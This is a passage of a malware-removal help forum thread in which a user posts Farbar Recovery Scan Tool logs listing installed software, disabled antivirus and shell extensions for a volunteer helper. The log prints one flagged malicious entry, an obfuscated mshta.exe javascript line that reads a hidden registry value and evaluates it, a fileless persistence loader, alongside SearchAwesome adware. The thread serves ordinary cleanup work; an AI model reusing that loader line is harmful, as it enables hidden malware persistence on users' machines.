Help, need to get virus out of my laptop


  • This topic is locked
137 replies to this topic

#16 RayS

  • Malware Response Team
  • 2,433 posts
  • OFFLINE
  • Gender:Male
  • Location:USA
  • Local time:02:17 AM

Posted 05 June 2018 - 05:56 PM

Hi Dan,

Both Fixlog.txt and Addition.txt are truncated -- most of the text has been cut off (see your posts #14 and #15). Also, all your posts are in double space.

Please copy the Notepad files to your thumb drive and then transfer the thumb drive to your clean PC. When you're on your clean PC, copy and paste directly from the Notepad files. Use Ctrl+A and Ctrl+V to be sure you get an exact copy onto this forum. Don't use any editor other than Notepad.

Thank you,

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.



#17 danban

  • Topic Starter
  • Members
  • 119 posts
  • OFFLINE
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 05 June 2018 - 06:10 PM

Hi Ray,

Sorry about that,

I redid it again and copied it from Notepad.

Here's the Fixlog.txt:


Fix result of Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
Ran by Dan (04-06-2018 21:01:59) Run:9
Running from C:\Users\Dan\Desktop
Loaded Profiles: Dan (Available Profiles: Dan)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************

*****************
 
 
==== End of Fixlog 21:02:01 ====


#18 danban

  • Topic Starter
  • Members
  • 119 posts
  • OFFLINE
  • Gender:Male
  • Location:Bronx New York
  • Local time:03:17 AM

Posted 05 June 2018 - 06:12 PM

Here's the Addition.txt:


Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
Ran by Dan (04-06-2018 21:07:21)
Running from C:\Users\Dan\Desktop
Windows 8.1 Connected (Update) (X64) (2015-01-30 09:55:12)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1066246007-1091995785-1061003623-500 - Administrator - Disabled)
Dan (S-1-5-21-1066246007-1091995785-1061003623-1001 - Administrator - Enabled) => C:\Users\Dan
Guest (S-1-5-21-1066246007-1091995785-1061003623-501 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Antivirus Free Edition (Disabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Antivirus Free Edition (Disabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Comodo Defense+ (Disabled - Up to date) {6BAD9487-8DE8-D130-293E-C6A728B4104F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: COMODO Firewall (Disabled) {E8F7F446-E1BD-DFE6-38D1-54E0ADE01D89}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4K Video Downloader 4.4 (HKLM-x32\...\{CAB406EC-AF92-417D-9BBB-B2ECE1BC7BA6}) (Version: 4.4.2.2255 - Open Media LLC)
7-Zip (HKLM\...\{F43D5365-6E1C-4A2B-BE51-E16D9554FB1D}) (Version: 9.2.0 - 7-Zip) Hidden
7-Zip (HKLM-x32\...\7-Zip 9.2.0) (Version: 9.2.0 - 7-Zip)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)
Adobe After Effects CC 2015.3 (HKLM-x32\...\AEFT_13_8_0) (Version: 13.8.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_3_0) (Version: 10.3.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
Aeon (HKLM-x32\...\Aeon) (Version: 3.7.4 - SoundSpectrum)
Andy OS (HKLM\...\Andy OS) (Version: 0.45.5.0 - Andy OS, Inc)
Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Applian Director (HKLM-x32\...\Applian Director3.01) (Version: 3.01 - Applian Technologies Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.2.8 - ASUS)
ASUS Screen Saver (HKLM-x32\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.3 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 2.2.14 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 2.01.0021 - ASUS)
ASUSDVD (HKLM-x32\...\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.) Hidden
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.)
AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.12.311 - ASUSTEK)
AVS Audio Converter 8.1.1 (HKLM-x32\...\AVS Audio Converter_is1) (Version: 8.1.1.549 - Online Media Technologies Ltd.)
AVS Audio Editor 8.1.1 (HKLM-x32\...\AVS Audio Editor_is1) (Version: 8.1.1.506 - Online Media Technologies Ltd.)
AVS Disc Creator 5.2.5 (HKLM-x32\...\AVS Disc Creator_is1) (Version: 5.2.5.536 - Online Media Technologies Ltd.)
AVS Document Converter 3.0.2 (HKLM-x32\...\AVS Document Converter_is1) (Version: 3.0.2.238 - Online Media Technologies Ltd.)
AVS Image Converter 4.0.2 (HKLM-x32\...\AVS Image Converter_is1) (Version: 4.0.2.281 - Online Media Technologies Ltd.)
AVS Media Player 4.3.1 (HKLM-x32\...\AVS Media Player_is1) (Version: 4.3.1.114 - Online Media Technologies Ltd.)
AVS Photo Editor 2.3.4 (HKLM-x32\...\AVS Photo Editor_is1) (Version: 2.3.4.148 - Online Media Technologies Ltd.)
AVS Registry Cleaner 3.0.3 (HKLM-x32\...\AVS Registry Cleaner_is1) (Version: 3.0.3.272 - Online Media Technologies Ltd.)
AVS Video Converter 9.2.1 (HKLM-x32\...\AVS4YOU Video Converter 7_is1) (Version: 9.2.1.579 - Online Media Technologies Ltd.)
AVS Video Editor 7.2.1 (HKLM-x32\...\AVS Video Editor_is1) (Version: 7.2.1.269 - Online Media Technologies Ltd.)
AVS Video ReMaker 5.0.2 (HKLM-x32\...\AVS Video ReMaker_is1) (Version: 5.0.2.175 - Online Media Technologies Ltd.)
Bandicam (HKLM-x32\...\Bandicam) (Version: 3.0.4.1036 - Bandisoft.com)
Bandicut (HKLM-x32\...\Bandicut) (Version: 1.2.7.132 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Beta Bugs FloFi VST (HKLM-x32\...\FloFi) (Version: "1.1.0" - "BetaBugs")
Beta Bugs Moneo VST (HKLM-x32\...\Moneo) (Version: "1.0.0" - "BetaBugs")
Beta Bugs WideBug VST (HKLM-x32\...\WideBug) (Version: "1.0.0" - "BetaBugs")
Bitdefender Antivirus Free Edition (HKLM\...\BitDefender Gonzales) (Version: 1.0.21.1109 - Bitdefender)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.15 - Piriform)
COMODO Firewall (HKLM\...\{1EBC6C6F-7D31-4897-B241-DC7052F3E7A5}) (Version: 8.2.0.5027 - COMODO Security Solutions Inc.)
CrazyTalk Animator v2.0 Pipeline (HKLM-x32\...\{7127D4CC-78E6-41E3-8BCB-A50ED34846E2}) (Version: 2.0.1214.1 - Reallusion Inc.)
CrazyTalk v7.32 Standard (HKLM-x32\...\{27C4EA98-84A3-4CDF-A436-F984A0283357}) (Version: 7.32.3114.1 - Reallusion Inc.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DaVinci Resolve (HKLM\...\{9B4515CC-A703-49D2-85E6-5348CA30534D}) (Version: 12.5.0032 - Blackmagic Design)
DS-MP3 Source 1.30 (HKLM-x32\...\DS-MP3 Source) (Version:  - )
Eusing Free MP3 Cutter (HKLM-x32\...\Eusing Free MP3 Cutter) (Version:  - )
FaceGen Artist Demo (HKLM-x32\...\{280BB5D8-30DC-4D62-B4D5-A3C19BB30479}) (Version: 1.10.0.0 - Singular Inversions Inc.)
FaceGen Artist Pro (HKLM-x32\...\{F6F73B62-D4E0-46B0-BD1C-3F4F55B107D8}) (Version: 1.10.0.0 - Singular Inversions Inc.)
Flvto Youtube Downloader (HKLM-x32\...\Flvto Youtube Downloader) (Version: 0.6.9 - Hotger)
Gadwin PrintScreen (64-Bit) (HKLM\...\{819A52E1-0929-469A-BEB6-1AEBE0873CFC}) (Version: 5.4.2.0 - Gadwin Systems)
GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 65.0.3325.181 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Gramblr (HKLM\...\Gramblr) (Version: 2.9.127 - Gramblr Team)
GROOVE 5.6.3 Pro Edition (HKLM\...\{21D8E7FE-7FE7-46B3-B578-22E1ABC5E407}) (Version: 5.6.3 - Gemini)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3355 - Intel Corporation)
Intel® Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.0.0.1002 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
ISSE version 0.2.0 (HKLM\...\{9330BAEC-6E26-4C5B-93A1-8BDD9ACF231B}_is1) (Version: 0.2.0 - CCRMA, Stanford University)
ivsEdits Free Edition (HKLM-x32\...\ivsEdits Free Edition) (Version:  - )
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
JBridge (HKLM-x32\...\JBridge) (Version:  - JBridge)
Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
KRISTAL Audio Engine (HKLM-x32\...\KRISTAL Audio Engine) (Version:  - )
Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks)
LUXONIX LFX-1310 (HKLM-x32\...\LUXONIX_LFX-1310) (Version: 1.4 - LUXONIX)
MakeMKV v1.9.1 (HKLM-x32\...\MakeMKV) (Version: v1.9.1 - GuinpinSoft inc)
Massey Plugins Demos [Remove only] (HKLM-x32\...\Massey Plugins Demos) (Version:  - )
MediaShuttlePlugin-v5.4 (HKLM-x32\...\{BA567CFA-F158-44C3-AA40-1773478BD477}) (Version: 5.4.4.71844 - Signiant Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\OneDriveSetup.exe) (Version: 18.025.0204.0009 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movavi Video Editor 11 (HKLM-x32\...\Movavi Video Editor 11) (Version: 11.4.1 - Movavi)
Movavi Video Suite 12 (HKLM-x32\...\Movavi Video Suite 12) (Version: 12.0.0 - Movavi)
Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 55.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 en-US)) (Version: 55.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0 - Mozilla)
mp3splt-gtk (HKLM-x32\...\mp3splt-gtk) (Version:  - )
Muvizu:Play - Heroes and villains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroesAndVillains) (Version:  - Digimania Ltd)
Muvizu:Play - Heroes and villains Lairs (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroAndVillainLairs) (Version:  - Digimania Ltd)
Muvizu:Play - Lighting Presets (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuLightingPresets) (Version:  - Digimania Ltd)
Muvizu:Play - Mandy Content (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuMandyContentPack) (Version:  - Digimania Ltd)
Muvizu:Play - Prisons (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuPrisons) (Version:  - Digimania Ltd)
Muvizu:Play - Rosie (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuRosie) (Version:  - Digimania Ltd)
Muvizu:Play - Trains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuTrains) (Version:  - Digimania Ltd)
Muvizu:Play (HKLM-x32\...\Muvizu) (Version: 2015.08.20.01R - Digimania Ltd)
ocenaudio (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ocenaudio) (Version: 2.0.14 - ocenaudio Team)
PitchWorks remove (HKLM-x32\...\PitchWorks DX) (Version:  - )
PrimoPDF -- brought to you by Nitro PDF Software (HKLM-x32\...\PrimoPDF) (Version: 5 - Nitro PDF Software)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.27040 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7213 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Replay Media Catcher 5 (5.0.1.54) (HKLM-x32\...\Replay Media Catcher 5) (Version: 5.0.1.54 - Applian Technologies)
Replay Video Capture 7 (HKLM-x32\...\Replay Video Capture7.4) (Version: 7.4 - Applian Technologies Inc.)
SearchAwesome (HKLM\...\6320c4d4d9492959f6f8b43b8fdbf2f5) (Version: 13.14.1.204 (i1.0) - SearchAwesome) <==== ATTENTION
ShapeShop B5 (HKLM-x32\...\ShapeShop) (Version:  - )
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
SMPlayer 16.6.0 (HKLM-x32\...\SMPlayer) (Version: 16.6.0 - Ricardo Villalba)
Softube Plug-Ins (VST AAX 32-bit) (HKLM-x32\...\Softube Plug-Ins (VST AAX 32-bit)) (Version: 2.2.91 - Softube AB)
Synfig Studio (HKLM-x32\...\synfigstudio) (Version: 1.0.2 - )
Total Recorder 8.5 Standard Edition (HKLM-x32\...\TotalRecorder) (Version:  - )
Tupi version 0.2-4 (HKLM-x32\...\Tupi_is1) (Version: 0.2-4 - )
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.8.3 - Tweaking.com)
Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version:  - WildTangent) Hidden
Virtual Magnifying Glass v3.6 (HKLM-x32\...\Virtual Magnifying Glass_is1) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VMware Player (HKLM\...\{E452E727-86B8-4233-8CC3-41FD817AFAFF}) (Version: 6.0.7 - VMware, Inc.) Hidden
VMware VIX (HKLM-x32\...\{F99FC179-EA67-4BBC-8955-BDDA0CB94B88}) (Version: 1.13.7.62285 - VMware, Inc.)
WD My Cloud (HKLM\...\{3082756C-2147-411F-AE6A-9DCEF0121903}) (Version: 1.0.7.5 - Western Digital Technologies, Inc.)
WebStorage (HKLM-x32\...\WebStorage) (Version: 2.1.2.301 - ASUS Cloud Corporation)
WhiteCap (HKLM-x32\...\WhiteCap) (Version: 5.0.5 - SoundSpectrum)
WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-asus) (Version: 4.0.11.2 - WildTangent)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
Windows Driver Package - ASUS (ATP) Mouse  (03/17/2014 1.0.0.207) (HKLM\...\AA2CC56D4BBEE037DC99871F5F6551133D2A0CC3) (Version: 03/17/2014 1.0.0.207 - ASUS)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.31 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
WinX DVD Ripper Platinum 7.5.18 (HKLM-x32\...\WinX DVD Ripper Platinum_is1) (Version:  - Digiarty Software, Inc.)
WonderFox DVD Ripper Speedy 8.1 (HKLM-x32\...\WonderFox DVD Ripper Speedy) (Version: 8.1 - WonderFox Soft, Inc.)
WonderFox DVD Video Converter 10.0 (HKLM-x32\...\WonderFox DVD Video Converter) (Version: 10.0 - WonderFox Soft, Inc.)
Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version:  - Yahoo! Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ChromeHTML: ->  <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Dan\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileCoAuthLib64.dll => No File
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Classes\f2e8449: "C:\Windows\system32\mshta.exe" "javascript:TOWG9H8n="9fTue2";F6q=new ActiveXObject("WScript.Shell");yYl78Ye="OOPGIb";j0tdG8=F6q.RegRead("HKCU\\software\\wsfl\\nfhvb");CnQ2SRmC="VxncXy";eval(j0tdG8);Cw1zFO6q="2Od3ft0";" <==== ATTENTION
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers1-x32: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers1-x32: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers1-x32: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers1-x32: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2015-04-06] (Online Media Technologies Ltd.)
ContextMenuHandlers1-x32: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File
ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers2: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers2-x32: [VMDiskMenuHandler] -> {271DC252-6FE1-4D59-9053-E4CF50AB99DE} => C:\Program Files (x86)\VMware\VMware Player\vmdkShellExt.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers2-x32: [VMDiskMenuHandler64] -> {E4D28EDC-8C0B-43EE-9E7D-C8A8682334DC} => C:\Program Files (x86)\VMware\VMware Player\x64\vmdkShellExt64.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers3: [BackupContextMenuExtension] -> {b1b96b20-da1d-4a3c-92c1-7229b32f2326} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2013-11-13] (Intel Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers6: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers6: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program File (x86) - RevoUninPro - Uninstaller program - 30 Day Free Trial - 5-15-2016\Revo Uninstaller Pro\RUExt.dll [2012-12-29] (VS Revo Group)
